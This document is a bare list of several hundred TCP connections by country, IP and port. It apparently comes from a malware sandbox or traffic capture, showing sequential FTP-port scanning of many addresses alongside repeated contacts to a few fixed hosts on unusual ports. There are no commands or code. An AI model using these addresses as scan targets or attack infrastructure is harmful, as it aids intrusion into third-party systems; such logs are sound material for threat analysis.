TN 102.107.250.10:21 tcp
US 20.83.148.22:80 tcp
US 75.247.81.10:21 tcp
MW 102.71.12.10:21 tcp
US 136.162.35.10:21 tcp
US 15.34.131.10:21 tcp
DE 87.164.75.10:21 tcp
US 152.222.160.10:21 tcp
GB 90.221.99.10:21 tcp
US 15.173.166.10:21 tcp
TW 114.46.188.10:21 tcp
US 79.75.215.10:21 tcp
US 15.69.251.10:21 tcp
US 168.68.193.10:21 tcp
IT 79.50.167.10:21 tcp
US 137.182.24.10:21 tcp
KZ 5.251.234.10:21 tcp
NL 145.112.186.10:21 tcp
US 192.172.107.10:21 tcp
US 4.105.241.10:21 tcp
US 9.184.22.10:21 tcp
US 12.117.110.10:21 tcp
IT 2.112.213.10:21 tcp
RU 176.208.117.10:21 tcp
CN 220.195.4.10:21 tcp
US 166.140.89.10:21 tcp
US 216.255.3.10:21 tcp
UG 154.230.47.10:21 tcp
US 16.221.157.10:21 tcp
UA 89.209.153.10:21 tcp
BR 104.104.169.10:21 tcp
US 38.244.184.10:21 tcp
US 104.230.143.10:21 tcp
US 205.44.210.10:21 tcp
US 48.235.151.10:21 tcp
US 22.222.209.10:21 tcp
US 152.218.44.10:21 tcp
US 140.71.14.10:21 tcp
US 154.44.5.10:21 tcp
US 50.1.3.10:21 tcp
US 148.131.46.10:21 tcp
DE 195.2.181.10:21 tcp
US 7.244.198.10:21 tcp
JP 126.127.91.10:21 tcp
US 214.83.181.10:21 tcp
GB 146.198.242.10:21 tcp
BR 152.232.78.10:21 tcp
US 162.16.68.10:21 tcp
FI 89.17.82.10:21 tcp
FJ 27.123.163.10:21 tcp
CN 222.208.195.10:21 tcp
JP 221.42.87.10:21 tcp
JP 219.163.155.10:21 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
RU 185.215.113.217:80 185.215.113.217 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
PL 185.16.38.41:2035 tcp
RU 185.215.113.117:3333 tcp
CN 183.57.21.131:8095 tcp
US 20.83.148.22:80 tcp
AE 62.60.236.215:3210 tcp
US 20.83.148.22:80 tcp
DE 136.243.76.21:445 tcp
DE 136.243.76.21:139 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
NL 154.213.187.170:80 tcp
NL 154.213.187.170:80 tcp
NL 154.213.187.170:80 tcp
US 20.83.148.22:80 tcp
NL 154.213.187.170:80 tcp
NL 154.213.187.170:80 tcp
US 20.83.148.22:80 tcp
PH 1.37.14.11:21 tcp
US 167.137.83.11:21 tcp
CN 106.80.14.11:21 tcp
US 20.83.148.22:80 tcp
IT 78.6.23.11:21 tcp
DE 185.215.206.11:21 tcp
CN 36.197.150.11:21 tcp
SA 83.101.218.11:21 tcp
N/A 10.154.77.11:21 tcp
US 164.216.213.11:21 tcp
CN 221.183.250.11:21 tcp
US 20.83.148.22:80 tcp
FR 79.90.26.11:21 tcp
US 28.17.103.11:21 tcp
EG 156.166.159.11:21 tcp
US 216.57.136.11:21 tcp
US 56.235.21.11:21 tcp
US 7.126.22.11:21 tcp
US 165.217.194.11:21 tcp
SG 43.124.29.11:21 tcp
JP 223.135.231.11:21 tcp
JP 106.157.127.11:21 tcp
GB 31.70.106.11:21 tcp
CN 42.81.173.11:21 tcp
KR 220.92.65.11:21 tcp
CN 106.45.54.11:21 tcp
TR 95.5.29.11:21 tcp
TW 150.116.34.11:21 tcp
US 199.3.130.11:21 tcp
IT 79.24.108.11:21 tcp
US 20.83.148.22:80 tcp
DE 217.87.232.11:21 tcp
IE 57.143.9.11:21 tcp
US 216.105.134.11:21 tcp
IN 116.75.63.11:21 tcp
US 20.83.148.22:80 tcp
US 216.214.76.11:21 tcp
JP 210.238.251.11:21 tcp
N/A 10.168.55.11:21 tcp
CN 124.230.99.11:21 tcp
GR 213.16.172.11:21 tcp
CA 173.178.7.11:21 tcp
US 216.124.62.11:21 tcp
UG 155.255.6.11:21 tcp
US 70.136.197.11:21 tcp
US 6.214.128.11:21 tcp
KR 119.214.151.11:21 tcp
IN 117.215.95.11:21 tcp
US 48.253.254.11:21 tcp
US 20.72.253.11:21 tcp
US 146.38.76.11:21 tcp
US 23.229.184.11:21 tcp
IT 80.211.184.11:21 tcp
US 141.214.200.11:21 tcp
US 165.131.159.11:21 tcp
DE 37.82.213.11:21 tcp
JP 17.132.80.11:21 tcp
FR 4.233.50.11:21 tcp
US 30.199.11.11:21 tcp
KR 14.67.250.11:21 tcp
CN 220.185.179.11:21 tcp
PL 185.16.38.41:2022 tcp
JP 218.230.176.11:21 tcp
US 73.26.187.11:21 tcp
CN 180.140.158.11:21 tcp
CN 125.37.201.11:21 tcp
US 24.218.90.11:21 tcp
US 20.83.148.22:80 tcp
US 74.159.189.11:21 tcp
VN 103.195.241.11:21 tcp
KR 220.84.110.11:21 tcp
CN 42.162.231.11:21 tcp
US 131.171.213.11:21 tcp
HK 156.230.170.11:21 tcp
US 66.214.231.11:21 tcp
US 20.109.238.11:21 tcp
US 34.210.119.11:21 tcp
AE 62.60.236.215:3210 tcp
NL 145.103.1.11:21 tcp
US 171.139.141.11:21 tcp
US 69.223.18.11:21 tcp
AU 203.219.128.11:21 tcp
NZ 162.112.29.11:21 tcp
CY 62.152.20.11:21 tcp
FR 46.33.168.11:21 tcp
NL 20.61.195.11:21 tcp
US 132.14.155.11:21 tcp
DE 53.49.205.11:21 tcp
SG 43.14.77.11:21 tcp
CN 103.107.31.11:21 tcp
US 3.31.56.11:21 tcp
US 209.147.23.11:21 tcp
IN 223.226.80.11:21 tcp
US 97.199.106.11:21 tcp
CN 222.186.172.42:1000 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
RU 185.215.113.67:15206 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
AE 62.60.236.215:3210 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
RU 185.215.113.67:40960 tcp
AE 62.60.236.215:3210 tcp
KR 114.199.206.12:21 tcp
US 32.56.84.12:21 tcp
AU 13.236.2.12:21 tcp
US 153.57.57.12:21 tcp
TR 85.97.172.12:21 tcp
US 168.54.104.12:21 tcp
TW 61.231.147.12:21 tcp
US 99.42.111.12:21 tcp
US 166.203.129.12:21 tcp
US 170.136.240.12:21 tcp
US 167.78.168.12:21 tcp
DE 79.226.224.12:21 tcp
US 146.29.66.12:21 tcp
JP 133.77.79.12:21 tcp
TH 157.179.247.12:21 tcp
CN 119.248.255.12:21 tcp
US 11.50.227.12:21 tcp
US 209.185.11.12:21 tcp
GB 195.68.207.12:21 tcp
AT 213.47.197.12:21 tcp
US 8.27.97.12:21 tcp
US 70.148.121.12:21 tcp
NG 102.88.77.12:21 tcp
US 207.41.50.12:21 tcp
CN 115.230.221.12:21 tcp
US 29.243.184.12:21 tcp
US 20.83.148.22:80 tcp
US 33.177.49.12:21 tcp
US 160.229.201.12:21 tcp
JP 126.189.123.12:21 tcp
US 20.83.148.22:80 tcp
FR 141.194.133.12:21 tcp
MU 196.246.194.12:21 tcp
US 146.57.6.12:21 tcp
CN 120.9.43.12:21 tcp
IT 35.152.15.12:21 tcp
US 22.127.49.12:21 tcp
US 75.24.117.12:21 tcp
US 16.121.38.12:21 tcp
SI 94.140.73.12:21 tcp
US 73.7.238.12:21 tcp
GB 25.179.197.12:21 tcp
KR 211.183.104.12:21 tcp
JP 194.223.230.12:21 tcp
CN 116.205.26.12:21 tcp
KR 43.201.11.12:21 tcp
CA 132.246.163.12:21 tcp
HK 175.159.119.12:21 tcp
FR 78.255.90.12:21 tcp
CN 61.153.8.12:21 tcp
RS 178.222.155.12:21 tcp
CN 203.148.32.12:21 tcp
CN 123.66.102.12:21 tcp
TW 140.124.241.12:21 tcp
DE 53.175.154.12:21 tcp
CN 8.131.198.12:21 tcp
BR 191.36.125.12:21 tcp
MX 189.136.249.12:21 tcp
US 35.173.134.12:21 tcp
CA 142.176.112.12:21 tcp
IT 80.18.189.12:21 tcp
JP 133.125.148.12:21 tcp
AU 123.200.196.12:21 tcp
US 99.18.71.12:21 tcp
BR 177.88.52.12:21 tcp
US 52.206.4.12:21 tcp
KR 125.134.117.12:21 tcp
KR 121.146.223.12:21 tcp
NL 77.61.32.12:21 tcp
BR 189.116.120.12:21 tcp
US 3.164.23.12:21 tcp
FR 88.138.48.12:21 tcp
US 169.137.108.12:21 tcp
US 97.150.236.12:21 tcp
LT 193.200.209.12:21 tcp
GB 45.56.249.12:21 tcp
ES 90.74.245.12:21 tcp
CN 182.205.233.12:21 tcp
AU 101.160.222.12:21 tcp
US 22.55.23.12:21 tcp
US 144.171.82.12:21 tcp
US 24.245.8.12:21 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
AE 62.60.236.215:3210 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
CN 183.57.21.131:8095 tcp
AE 62.60.236.215:3210 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
RU 185.215.113.117:3333 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
N/A 127.204.212.9:21 tcp
US 20.83.148.22:80 tcp
TZ 197.186.148.13:21 tcp
AU 123.100.48.13:21 tcp
US 20.14.8.13:21 tcp
US 184.138.250.13:21 tcp
US 71.9.182.13:21 tcp
US 166.228.132.13:21 tcp
TN 102.31.130.13:21 tcp
BR 20.197.223.13:21 tcp
IT 93.55.157.13:21 tcp
PY 181.120.56.13:21 tcp
US 134.253.36.13:21 tcp
KR 125.249.13.13:21 tcp
US 166.21.78.13:21 tcp
US 44.114.206.13:21 tcp
IN 183.82.50.13:21 tcp
JP 14.128.90.13:21 tcp
CN 39.168.248.13:21 tcp
RE 77.143.164.13:21 tcp
KE 154.78.67.13:21 tcp
US 108.247.176.13:21 tcp
US 96.124.192.13:21 tcp
KR 182.227.32.13:21 tcp
US 136.81.146.13:21 tcp
CA 142.89.246.13:21 tcp
US 185.208.158.202:80 bertbhz.com tcp
CN 60.252.144.13:21 tcp
CN 122.77.229.13:21 tcp
CN 36.183.167.13:21 tcp
US 3.144.211.13:21 tcp
RU 91.232.197.13:21 tcp
US 68.113.229.13:21 tcp
JP 110.66.226.13:21 tcp
US 140.27.194.13:21 tcp
US 19.70.153.13:21 tcp
US 55.147.28.13:21 tcp
US 17.207.86.13:21 tcp
AR 200.4.68.13:21 tcp
MA 196.80.8.13:21 tcp
DE 81.25.162.13:21 tcp
GB 196.47.95.13:21 tcp
US 215.63.185.13:21 tcp
GB 139.153.13.13:21 tcp
MY 115.164.220.13:21 tcp
EG 156.199.203.13:21 tcp
US 20.83.148.22:80 tcp
US 146.95.47.13:21 tcp
US 76.232.79.13:21 tcp
AE 62.60.236.215:3210 tcp
US 20.83.148.22:80 tcp
DE 53.209.98.13:21 tcp
US 96.103.111.13:21 tcp
CA 142.64.79.13:21 tcp
EG 196.202.116.13:21 tcp
US 194.42.206.13:21 tcp
FR 90.83.88.13:21 tcp
US 174.141.21.13:21 tcp
CN 113.195.95.13:21 tcp
JP 150.92.94.13:21 tcp
ID 114.3.160.13:21 tcp
US 35.32.88.13:21 tcp
CN 211.89.222.13:21 tcp
BR 179.42.89.13:21 tcp
SA 151.173.147.13:21 tcp
JP 17.87.108.13:21 tcp
US 22.145.102.13:21 tcp
KR 123.111.226.13:21 tcp
US 20.57.56.13:21 tcp
FI 130.230.219.13:21 tcp
MX 132.248.104.13:21 tcp
ME 95.155.48.13:21 tcp
US 23.6.117.13:21 tcp
US 128.155.57.13:21 tcp
DE 91.29.108.13:21 tcp
CN 39.143.82.13:21 tcp
US 4.91.202.13:21 tcp
DE 62.125.216.13:21 tcp
US 68.124.111.13:21 tcp
ES 46.24.173.13:21 tcp
ZA 105.227.86.13:21 tcp
DE 78.51.8.13:21 tcp
CN 101.133.222.13:21 tcp
US 38.30.82.13:21 tcp
CA 96.48.10.13:21 tcp
NO 193.71.142.13:21 tcp
US 206.223.5.13:21 tcp
KE 197.156.167.13:21 tcp
DE 95.223.231.13:21 tcp
CA 99.252.213.13:21 tcp
US 150.135.16.13:21 tcp
LC 57.91.157.13:21 tcp
DE 53.5.146.13:21 tcp
CN 222.186.172.42:1000 tcp
NL 154.213.187.170:80 tcp
NL 154.213.187.170:80 tcp
NL 154.213.187.170:80 tcp
NL 154.213.187.170:80 tcp
NL 154.213.187.170:80 tcp
NL 89.105.201.183:2023 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
AE 62.60.236.215:3210 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
RU 185.215.113.67:15206 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
AE 62.60.236.215:3210 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
CN 183.244.135.14:21 tcp
GB 51.251.248.14:21 tcp
US 20.83.148.22:80 tcp
US 154.27.55.14:21 tcp
AT 45.158.34.14:21 tcp
US 32.157.70.14:21 tcp
JP 126.115.104.14:21 tcp
US 204.204.85.14:21 tcp
CN 218.107.36.14:21 tcp
JP 219.5.129.14:21 tcp
RU 185.215.113.67:40960 tcp
RO 92.83.141.14:21 tcp
US 64.78.87.14:21 tcp
US 153.10.56.14:21 tcp
CH 57.23.118.14:21 tcp
CN 123.172.27.14:21 tcp
US 8.245.219.14:21 tcp
TW 59.113.94.14:21 tcp
NZ 121.90.16.14:21 tcp
CN 175.90.65.14:21 tcp
US 164.189.42.14:21 tcp
US 162.96.197.14:21 tcp
JP 133.167.169.14:21 tcp
CA 99.247.152.14:21 tcp
BR 187.68.230.14:21 tcp
US 73.48.85.14:21 tcp
AU 164.80.98.14:21 tcp
CZ 46.234.98.14:21 tcp
US 30.168.201.14:21 tcp
CN 58.253.5.14:21 tcp
NO 78.91.232.14:21 tcp
JP 60.69.53.14:21 tcp
SG 4.146.166.14:21 tcp
US 96.174.167.14:21 tcp
HK 182.153.5.14:21 tcp
GB 81.151.112.14:21 tcp
SA 77.31.202.14:21 tcp
CA 75.159.207.14:21 tcp
US 214.52.110.14:21 tcp
CO 181.147.248.14:21 tcp
US 3.199.51.14:21 tcp
TW 114.34.142.14:21 tcp
NL 62.134.120.14:21 tcp
US 6.106.219.14:21 tcp
PA 186.74.25.14:21 tcp
US 56.174.132.14:21 tcp
US 158.224.15.14:21 tcp
DK 195.249.133.14:21 tcp
TR 46.155.227.14:21 tcp
CA 216.191.134.14:21 tcp
US 47.39.21.14:21 tcp
GB 18.132.226.14:21 tcp
CN 111.28.15.14:21 tcp
US 16.20.184.14:21 tcp
US 173.114.134.14:21 tcp
CN 182.124.147.14:21 tcp
US 199.177.143.14:21 tcp
ES 90.94.0.14:21 tcp
EG 45.102.51.14:21 tcp
GB 82.24.184.14:21 tcp
KR 218.50.90.14:21 tcp
AU 103.8.134.14:21 tcp
AU 120.159.217.14:21 tcp
AR 179.42.183.14:21 tcp
US 11.232.107.14:21 tcp
US 131.24.32.14:21 tcp
US 135.84.73.14:21 tcp
CA 167.37.115.14:21 tcp
CN 223.246.119.14:21 tcp
US 75.48.126.14:21 tcp
UA 5.58.140.14:21 tcp
US 50.182.77.14:21 tcp
US 66.34.12.14:21 tcp
US 204.86.207.14:21 tcp
NL 141.176.38.14:21 tcp
US 146.49.58.14:21 tcp
FR 79.80.237.14:21 tcp
CN 36.179.250.14:21 tcp
IL 95.35.193.14:21 tcp
CO 152.203.80.14:21 tcp
DZ 41.99.18.14:21 tcp
VN 115.73.188.14:21 tcp
US 104.185.51.14:21 tcp
US 107.160.203.14:21 tcp
NO 80.239.80.14:21 tcp
JP 203.114.43.14:21 tcp
US 184.16.187.14:21 tcp
US 208.112.173.14:21 tcp
SG 203.125.99.14:21 tcp
JP 130.54.159.14:21 tcp
US 99.110.206.14:21 tcp
US 17.178.188.14:21 tcp
US 139.43.25.14:21 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
AE 62.60.236.215:3210 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
HK 103.59.103.198:80 103.59.103.198 tcp
US 20.83.148.22:80 tcp
IL 195.60.232.6:100 195.60.232.6 tcp
AE 62.60.236.215:3210 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
FI 95.216.143.20:12695 tcp
RU 176.111.174.140:80 176.111.174.140 tcp
RU 176.111.174.140:80 176.111.174.140 tcp
RU 176.111.174.140:80 176.111.174.140 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
RU 176.111.174.140:80 176.111.174.140 tcp
RU 176.111.174.140:80 176.111.174.140 tcp
US 20.83.148.22:80 tcp
RU 176.111.174.140:80 176.111.174.140 tcp
CN 8.134.163.72:801 tcp
CN 222.186.172.42:1000 tcp
RU 176.111.174.140:80 176.111.174.140 tcp
RU 185.215.113.117:3333 tcp
AE 62.60.236.215:3210 tcp
RU 176.111.174.140:80 176.111.174.140 tcp
US 140.200.194.15:21 tcp
KR 211.239.170.15:21 tcp
IT 151.86.228.15:21 tcp
AU 168.134.149.15:21 tcp
US 40.0.200.15:21 tcp
KE 196.207.157.15:21 tcp
US 48.173.168.15:21 tcp
US 104.179.198.15:21 tcp
RU 176.111.174.140:1912 tcp
PL 31.182.118.15:21 tcp
JP 133.108.70.15:21 tcp
JP 220.9.22.15:21 tcp
US 205.165.199.15:21 tcp
GB 90.254.76.15:21 tcp
US 156.98.142.15:21 tcp
JP 58.70.0.15:21 tcp
JP 114.148.12.15:21 tcp
US 184.76.1.15:21 tcp
JP 118.14.89.15:21 tcp
US 215.161.104.15:21 tcp
US 141.190.101.15:21 tcp
US 20.83.148.22:80 tcp
US 63.246.161.15:21 tcp
CO 181.236.215.15:21 tcp
JP 221.184.70.15:21 tcp
US 66.111.117.15:21 tcp
US 52.159.31.15:21 tcp
US 13.173.200.15:21 tcp
US 162.116.187.15:21 tcp
BR 152.252.113.15:21 tcp
US 9.156.237.15:21 tcp
US 74.149.184.15:21 tcp
CA 66.49.134.15:21 tcp
GB 62.64.254.15:21 tcp
US 140.187.79.15:21 tcp
IE 89.101.0.15:21 tcp
US 65.136.238.15:21 tcp
US 144.225.214.15:21 tcp
CN 124.75.1.15:21 tcp
US 20.83.148.22:80 tcp
US 128.91.237.15:21 tcp
BR 38.7.230.15:21 tcp
CL 204.137.130.15:21 tcp
US 56.192.94.15:21 tcp
CN 175.66.240.15:21 tcp
AO 105.173.46.15:21 tcp
US 32.79.48.15:21 tcp
KR 202.31.99.15:21 tcp
JP 42.150.210.15:21 tcp
AU 180.200.214.15:21 tcp
US 97.89.153.15:21 tcp
US 135.245.50.15:21 tcp
CN 106.34.167.15:21 tcp
CA 70.55.194.15:21 tcp
US 67.242.46.15:21 tcp
HK 154.26.201.15:21 tcp
DE 94.156.177.41:80 94.156.177.41 tcp
US 99.64.159.15:21 tcp
US 69.168.118.15:21 tcp
FR 86.201.9.15:21 tcp
NO 139.109.46.15:21 tcp
US 167.66.41.15:21 tcp
US 55.114.69.15:21 tcp
US 143.207.118.15:21 tcp
GB 95.142.147.15:21 tcp
CO 191.104.148.15:21 tcp
US 216.90.116.15:21 tcp
US 198.181.94.15:21 tcp
DE 2.167.96.15:21 tcp
CN 110.122.92.15:21 tcp
GB 25.177.112.15:21 tcp
US 216.143.236.15:21 tcp
TR 176.236.93.15:21 tcp
US 148.114.28.15:21 tcp
NI 165.98.196.15:21 tcp
US 135.99.171.15:21 tcp
NO 188.113.118.15:21 tcp
MY 219.92.110.15:21 tcp
US 23.21.52.15:21 tcp
US 19.206.56.15:21 tcp
US 129.201.218.15:21 tcp
US 152.82.244.15:21 tcp
FR 62.106.145.15:21 tcp
US 147.38.148.15:21 tcp
US 150.194.142.15:21 tcp
CO 167.0.47.15:21 tcp
US 44.153.187.15:21 tcp
US 107.45.80.15:21 tcp
US 207.206.162.15:21 tcp
US 20.83.148.22:80 tcp
NL 31.214.157.226:80 31.214.157.226 tcp
US 20.83.148.22:80 tcp
NL 89.105.201.183:2023 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
NL 154.213.187.170:80 tcp
NL 154.213.187.170:80 tcp
NL 154.213.187.170:80 tcp
AE 62.60.236.215:3210 tcp
US 20.83.148.22:80 tcp
NL 154.213.187.170:80 tcp
NL 154.213.187.170:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
AE 62.60.236.215:3210 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
RU 185.215.113.67:15206 tcp
US 20.83.148.22:80 tcp
NL 89.105.201.183:2023 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 55.167.247.16:21 tcp
FR 83.196.85.16:21 tcp
US 65.244.80.16:21 tcp
MX 148.235.31.16:21 tcp
IR 89.198.53.16:21 tcp
US 9.216.187.16:21 tcp
US 166.158.19.16:21 tcp
CO 191.156.88.16:21 tcp
US 34.135.47.16:21 tcp
BR 179.157.174.16:21 tcp
TH 134.196.125.16:21 tcp
AU 158.45.125.16:21 tcp
BG 89.252.215.16:21 tcp
US 215.255.80.16:21 tcp
US 15.140.20.16:21 tcp
CN 182.131.148.16:21 tcp
US 199.190.63.16:21 tcp
AU 143.238.14.16:21 tcp
US 209.61.202.16:21 tcp
CA 24.68.181.16:21 tcp
CN 223.83.26.16:21 tcp
JP 52.140.207.16:21 tcp
CN 124.73.235.16:21 tcp
JP 219.187.175.16:21 tcp
JP 219.206.79.16:21 tcp
US 75.177.163.16:21 tcp
US 166.134.108.16:21 tcp
MA 105.130.185.16:21 tcp
IL 89.138.56.16:21 tcp
US 3.88.133.16:21 tcp
US 174.170.158.16:21 tcp
US 21.227.246.16:21 tcp
US 74.133.118.16:21 tcp
US 144.83.226.16:21 tcp
CN 60.219.86.16:21 tcp
KR 61.252.119.16:21 tcp
KR 221.145.18.16:21 tcp
CN 113.72.56.16:21 tcp
US 12.74.101.16:21 tcp
DK 83.90.213.16:21 tcp
TR 88.253.151.16:21 tcp
US 152.44.161.16:21 tcp
AR 186.140.110.16:21 tcp
US 24.236.58.16:21 tcp
US 11.233.189.16:21 tcp
TW 210.62.189.16:21 tcp
KE 196.100.123.16:21 tcp
CN 182.139.121.16:21 tcp
US 73.76.212.16:21 tcp
US 23.140.205.16:21 tcp
US 166.123.181.16:21 tcp
US 73.65.187.16:21 tcp
JP 27.91.171.16:21 tcp
US 99.8.199.16:21 tcp
US 215.140.107.16:21 tcp
JP 125.194.54.16:21 tcp
IE 144.2.50.16:21 tcp
PY 186.182.83.16:21 tcp
AU 160.25.37.16:21 tcp
SG 43.40.108.16:21 tcp
CA 137.186.12.16:21 tcp
AE 62.60.236.215:3210 tcp
CN 36.0.13.16:21 tcp
AU 172.196.186.16:21 tcp
JP 111.90.48.16:21 tcp
GB 62.190.109.16:21 tcp
US 13.78.164.16:21 tcp
US 131.85.122.16:21 tcp
US 20.83.148.22:80 tcp
TR 95.14.178.16:21 tcp
US 76.214.53.16:21 tcp
JP 113.150.1.16:21 tcp
US 192.185.76.16:21 tcp
US 22.117.243.16:21 tcp
US 129.116.168.16:21 tcp
US 3.194.105.16:21 tcp
BR 177.94.252.16:21 tcp
CA 70.29.14.16:21 tcp
US 20.83.148.22:80 tcp
US 38.81.221.16:21 tcp
US 12.90.255.16:21 tcp
BR 187.88.132.16:21 tcp
US 35.98.202.16:21 tcp
FR 78.238.176.16:21 tcp
CN 118.80.9.16:21 tcp
US 40.152.176.16:21 tcp
US 149.47.4.16:21 tcp
US 108.60.212.16:21 tcp
DE 164.133.151.16:21 tcp
US 20.83.148.22:80 tcp
RU 185.215.113.67:40960 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
NL 89.105.201.183:2023 tcp
AE 62.60.236.215:3210 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
FI 95.216.143.20:12695 tcp
DE 136.243.76.21:445 tcp
US 20.83.148.22:80 tcp
CN 222.186.172.42:1000 tcp
DE 136.243.76.21:139 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
CN 183.57.21.131:8095 tcp
US 20.83.148.22:80 tcp
AE 62.60.236.215:3210 tcp
US 20.83.148.22:80 tcp
VE 190.39.143.17:21 tcp
CN 175.67.69.17:21 tcp
KR 59.29.69.17:21 tcp
EG 154.141.29.17:21 tcp
HK 103.196.49.17:21 tcp
JP 221.241.16.17:21 tcp
DE 53.18.180.17:21 tcp
US 167.248.150.17:21 tcp
JP 61.201.233.17:21 tcp
US 20.83.148.22:80 tcp
US 131.39.88.17:21 tcp
US 100.204.238.17:21 tcp
JP 202.34.235.17:21 tcp
RU 92.37.151.17:21 tcp
JP 222.224.157.17:21 tcp
US 169.121.227.17:21 tcp
TW 140.122.180.17:21 tcp
US 146.129.188.17:21 tcp
AE 3.28.225.17:21 tcp
CN 221.198.113.17:21 tcp
TW 210.240.160.17:21 tcp
US 11.135.194.17:21 tcp
US 167.254.17.17:21 tcp
PL 62.229.52.17:21 tcp
US 74.152.127.17:21 tcp
TH 58.137.172.17:21 tcp
CN 1.90.210.17:21 tcp
CN 14.125.241.17:21 tcp
UA 62.84.251.17:21 tcp
GB 161.76.254.17:21 tcp
US 206.161.252.17:21 tcp
RU 85.202.226.17:21 tcp
GT 190.62.161.17:21 tcp
US 206.239.32.17:21 tcp
US 208.31.168.17:21 tcp
US 64.241.27.17:21 tcp
US 199.174.205.17:21 tcp
KR 1.109.11.17:21 tcp
CH 57.17.7.17:21 tcp
KR 175.233.80.17:21 tcp
US 208.240.158.17:21 tcp
ID 23.217.16.17:21 tcp
US 143.175.36.17:21 tcp
US 184.187.122.17:21 tcp
TR 176.216.57.17:21 tcp
US 169.189.165.17:21 tcp
US 22.255.6.17:21 tcp
US 63.224.63.17:21 tcp
US 7.198.131.17:21 tcp
SE 84.219.46.17:21 tcp
US 174.255.124.17:21 tcp
RU 185.215.113.117:3333 tcp
US 8.45.149.17:21 tcp
IN 117.211.37.17:21 tcp
GB 86.6.68.17:21 tcp
US 34.134.10.17:21 tcp
US 30.160.189.17:21 tcp
US 71.214.61.17:21 tcp
CN 124.165.214.17:21 tcp
US 169.56.142.17:21 tcp
CL 190.208.154.17:21 tcp
GB 130.88.127.17:21 tcp
US 76.196.224.17:21 tcp
HK 202.77.41.17:21 tcp
US 19.113.11.17:21 tcp
US 107.72.134.17:21 tcp
ID 39.195.188.17:21 tcp
RO 94.131.119.184:443 tcp
CN 112.62.61.17:21 tcp
FR 78.245.28.17:21 tcp
CA 142.92.31.17:21 tcp
US 159.161.255.17:21 tcp
US 15.18.57.17:21 tcp
US 24.90.147.17:21 tcp
CN 39.78.154.17:21 tcp
US 56.26.219.17:21 tcp
US 12.183.242.17:21 tcp
UA 134.249.32.17:21 tcp
US 174.202.8.17:21 tcp
US 21.131.32.17:21 tcp
CN 14.26.93.17:21 tcp
DE 195.127.214.17:21 tcp
GR 147.52.29.17:21 tcp
US 157.246.162.17:21 tcp
BR 179.111.184.17:21 tcp
US 4.124.47.17:21 tcp
US 208.233.83.17:21 tcp
NL 145.200.214.17:21 tcp
TR 88.245.88.17:21 tcp
AE 62.60.236.215:3210 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
RO 94.131.119.184:443 tcp
NL 154.213.187.170:80 tcp
NL 154.213.187.170:80 tcp
NL 154.213.187.170:80 tcp
NL 154.213.187.170:80 tcp
NL 154.213.187.170:80 tcp
US 20.83.148.22:80 tcp
AE 62.60.236.215:3210 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
AE 62.60.236.215:3210 tcp
US 20.83.148.22:80 tcp
CN 220.199.213.18:21 tcp
BG 31.13.204.18:21 tcp
US 104.69.60.18:21 tcp
BR 177.48.60.18:21 tcp
GB 51.219.121.18:21 tcp
US 199.116.74.18:21 tcp
IN 111.93.52.18:21 tcp
US 20.83.148.22:80 tcp
CW 190.2.176.18:21 tcp
IN 163.47.208.18:21 tcp
IR 2.146.185.18:21 tcp
CN 58.20.69.18:21 tcp
US 20.83.148.22:80 tcp
KR 59.30.52.18:21 tcp
VN 171.249.172.18:21 tcp
US 204.154.110.18:21 tcp
SE 194.198.2.18:21 tcp
US 26.156.233.18:21 tcp
JP 150.3.9.18:21 tcp
CN 183.16.188.18:21 tcp
RU 37.144.38.18:21 tcp
CN 111.197.216.18:21 tcp
SE 81.232.83.18:21 tcp
SA 188.53.113.18:21 tcp
US 214.91.9.18:21 tcp
